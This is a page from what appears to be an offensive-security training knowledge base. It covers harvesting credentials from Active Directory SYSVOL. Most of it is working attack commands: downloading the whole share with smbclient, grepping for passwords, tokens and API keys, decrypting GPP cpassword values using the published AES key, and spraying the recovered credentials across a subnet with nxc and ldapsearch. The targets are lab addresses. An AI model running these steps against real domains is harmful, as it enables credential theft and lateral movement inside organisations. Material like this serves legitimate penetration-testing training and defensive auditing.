Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / GPO / Techniques

SYSVOL and GPP Secrets

SYSVOL is readable by normal domain users because clients need policy files. We use that read access to hunt old Group Policy Preference XML, scripts, registry policy files, and configuration files that expose credentials or operational secrets.

List SYSVOL

smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; ls'

Download SYSVOL

mkdir -p sysvol
smbclient "//10.10.10.200/SYSVOL" -U "ootw.local/student%student" -c 'recurse ON; prompt OFF; mget *'

Search from Linux

grep -RniE 'cpassword|password|passwd|pwd|secret|token|apikey|connectionString' sysvol/
find sysvol -iname 'Groups.xml' -o -iname 'Services.xml' -o -iname 'ScheduledTasks.xml' -o -iname 'Drives.xml' -o -iname 'DataSources.xml' -o -iname 'Registry.xml'

Search from Windows

Get-ChildItem "\\ootw.local\SYSVOL\ootw.local\Policies" -Recurse -Include *.xml,*.ini,*.txt,*.ps1,*.bat,*.vbs,*.config |
  Select-String -Pattern "cpassword","password","passwd","pwd","secret","token","apikey","connectionString"

Classic GPP credential files

Groups.xml
Services.xml
ScheduledTasks.xml
Printers.xml
Drives.xml
DataSources.xml

Decrypt cpassword

gpp-decrypt '<cpassword_value>'

Manual AES key reference

4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a4183abe85

Post-loot validation

nxc smb 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
nxc winrm 10.10.10.0/24 -u recovered_user -p 'RecoveredPassword!'
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\recovered_user" -w 'RecoveredPassword!' -b "DC=ootw,DC=local" '(objectClass=user)' sAMAccountName

Other files worth reading

Registry.pol
GptTmpl.inf
Scripts\Startup\*.bat
Scripts\Startup\*.ps1
Scripts\Logon\*.bat
Scripts\Logon\*.vbs
Machine\Preferences\Registry\Registry.xml
User\Preferences\Drives\Drives.xml

Notes

GPP cpassword is legacy but still appears in real environments because administrators removed the setting but did not delete the old XML.

Stale credentials still matter. Test them for password reuse before discarding them.